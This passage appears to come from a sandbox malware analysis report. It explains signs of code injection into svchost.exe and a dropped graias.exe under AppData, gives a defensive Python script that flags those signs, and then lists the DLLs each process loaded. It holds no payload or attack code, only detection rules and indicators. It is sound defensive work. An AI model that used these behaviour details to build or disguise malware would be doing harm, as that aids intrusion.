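The process creations above are worth reading closely: the 32-bit svchost.exe under SysWOW64 (the report also records it loading mscoree.dll in the section-load entries that follow) repeatedly launches chrome.exe on a go.microsoft.com fwlink URL whose parameters are o1=SHIM_NOVERSION_FOUND, version=(null) and processName=svchost.exe. That URL is what the .NET shim in mscoree.dll opens in the default browser when a managed image asks for a runtime version it cannot find, and the processName parameter names the process the CLR was being loaded into, which is a strong sign that managed code was run inside a svchost.exe that is not a .NET program. A genuine service host does not spawn browsers and does not load the CLR. The Python below is an added example, not Joe Sandbox tooling and not part of this report: it parses lines in this report's "Source: ... Process created:" / "Section loaded:" format and flags those indicators together with executables under user-writable paths (the graias.exe copy under AppData\Roaming) that load network DLLs. The rule names, the sets of "system host" images, browsers, network DLLs and user-writable path fragments, and the sample lines (constructed from entries in this report) are all assumptions of the example.

```python
"""Flag injection and persistence indicators in Joe Sandbox style behaviour lines.

Added example for this report; not Joe Sandbox code. The rule names and the
sets of "system host" images, browsers, network DLLs and user-writable paths
are assumptions. SAMPLE_LINES is constructed from entries in this report.
"""
import ntpath
import re
from collections import defaultdict
from typing import List, NamedTuple, Optional
from urllib.parse import parse_qs, urlparse

SAMPLE_LINES = [  # constructed sample, modelled on the report's own entries
    r'Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0',
    r'Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown',
    r'Source: C:\Windows\SysWOW64\svchost.exe Section loaded: mscoree.dll',
    r'Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wininet.dll',
    r'Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: mscoree.dll',
    r'Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: winhttp.dll',
    r'Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: dnsapi.dll',
    r'Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll',
]

# The extracted report fuses table cells ("svchost.exeProcess created:") and appends
# the "Jump to behavior" link text; both forms are accepted here.
LINE_RE = re.compile(
    r"^Source:\s*(?P<src>.+?\.exe)\s*(?P<kind>Process created|Section loaded):\s*"
    r"(?P<detail>.*?)(?:Jump to behavior)?\s*$"
)

SYSTEM_HOSTS = {"svchost.exe"}  # assumption: native host that should neither load the CLR nor open browsers
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "iexplore.exe"}
NETWORK_DLLS = {"wininet.dll", "winhttp.dll", "dnsapi.dll", "ws2_32.dll", "mswsock.dll"}
USER_WRITABLE = ("\\appdata\\", "\\users\\public\\")  # assumption: image paths a standard user can write to


class Event(NamedTuple):
    source: str  # image that performed the action
    kind: str    # "Process created" or "Section loaded"
    detail: str  # child image plus command line, or the loaded DLL


def parse_lines(lines: List[str]) -> List[Event]:
    """Parse report lines; lines that are not one of the two event kinds are skipped."""
    events = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            events.append(Event(m["src"], m["kind"], m["detail"]))
    return events


def image_name(path: str) -> str:
    return ntpath.basename(path).lower()


def target_image(detail: str) -> str:
    """'<image path> "<image path>" args' -> image path (paths may contain spaces)."""
    return detail.split(' "', 1)[0] if ' "' in detail else detail.split(" ", 1)[0]


def dotnet_shim_error(cmdline: str) -> Optional[dict]:
    """Return the query of a .NET shim fwlink error URL (o1=SHIM_*) found in a command line.

    mscoree's shim opens this URL in the default browser when no matching runtime is
    found; its processName parameter names the process the CLR was being loaded into.
    """
    m = re.search(r"https?://go\.microsoft\.com/fwlink/\?\S+", cmdline)
    if not m:
        return None
    q = {k: v[0] for k, v in parse_qs(urlparse(m.group(0)).query).items()}
    return q if q.get("o1", "").startswith("SHIM_") else None


def find_indicators(events: List[Event]) -> list:
    """Return (rule, source image path, detail) tuples, in event order."""
    findings = []
    net_dlls = defaultdict(set)  # user-writable image path -> network DLLs it loaded
    for ev in events:
        src = image_name(ev.source)
        if ev.kind == "Process created":
            child = image_name(target_image(ev.detail))
            if src in SYSTEM_HOSTS and child in BROWSERS:
                findings.append(("system-host-spawns-browser", ev.source, child))
            shim = dotnet_shim_error(ev.detail)
            if shim:
                findings.append(("dotnet-shim-error-url", ev.source,
                                 f"{shim['o1']} reported for processName={shim.get('processName')}"))
        else:
            dll = ev.detail.lower()
            if src in SYSTEM_HOSTS and dll == "mscoree.dll":
                findings.append(("clr-loaded-into-system-host", ev.source, dll))
            if dll in NETWORK_DLLS and any(p in ev.source.lower() for p in USER_WRITABLE):
                net_dlls[ev.source].add(dll)
    for image, dlls in net_dlls.items():
        findings.append(("user-writable-image-loads-network-dlls", image, ", ".join(sorted(dlls))))
    return findings


if __name__ == "__main__":
    for rule, image, detail in find_indicators(parse_lines(SAMPLE_LINES)):
        print(f"[{rule}] {image}: {detail}")
```

Run it against the full "Behavior" listing of a report (one line per event) rather than the sample to get the complete picture; the network-DLL rule deliberately reports once per image rather than once per DLL so that a single dropped executable does not drown the output.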
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: mscoree.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: version.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: windowscodecs.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: iconcodecservice.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: dwrite.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: propsys.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: edputil.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: urlmon.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: iertutil.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: srvcli.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: netutils.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: windows.staterepositoryps.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: sspicli.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: wintypes.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: appresolver.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: bcp47langs.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: slc.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: sppc.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: onecorecommonproxystub.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: urlmon.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: wininet.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: iertutil.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: srvcli.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: netutils.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: ntmarta.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: propsys.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: twext.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: windows.staterepositoryps.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: appresolver.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: bcp47langs.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: slc.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: sppc.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: policymanager.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: msvcp110_win.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: ntshrui.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: sspicli.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: windows.fileexplorer.common.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: cscapi.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: twinapi.appcore.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: shacct.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: idstore.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: textshaping.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: samlib.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: starttiledata.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: acppage.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: sfc.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: msi.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: aepic.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: sfc_os.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: wlidprov.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: samcli.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: provsvc.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: edputil.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: wintypes.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: onecorecommonproxystub.dll
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe Section loaded: onecoreuapcommonproxystub.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: mscoree.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: apphelp.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: wldp.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: profapi.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: windowscodecs.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: amsi.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: userenv.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: msasn1.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: gpapi.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: iconcodecservice.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: dwrite.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: propsys.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: edputil.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: urlmon.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: iertutil.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: srvcli.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: netutils.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: windows.staterepositoryps.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: wintypes.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: appresolver.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: bcp47langs.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: slc.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: sppc.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: onecorecommonproxystub.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: winmm.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: urlmon.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: wininet.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: iertutil.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: srvcli.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: netutils.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: iphlpapi.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: mswsock.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: wldp.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: profapi.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: winhttp.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: winnsi.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: dnsapi.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: rasadhlp.dll
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe Section loaded: fwpuclnt.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: textshaping.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: textinputframework.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: coreuicomponents.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: coremessaging.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: coremessaging.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: windows.shell.servicehostbuilder.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: onecoreuapcommonproxystub.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: windows.staterepositoryps.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: edputil.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: policymanager.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: msvcp110_win.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: onecorecommonproxystub.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: version.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\svchost.exe Section loaded: wkscli.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
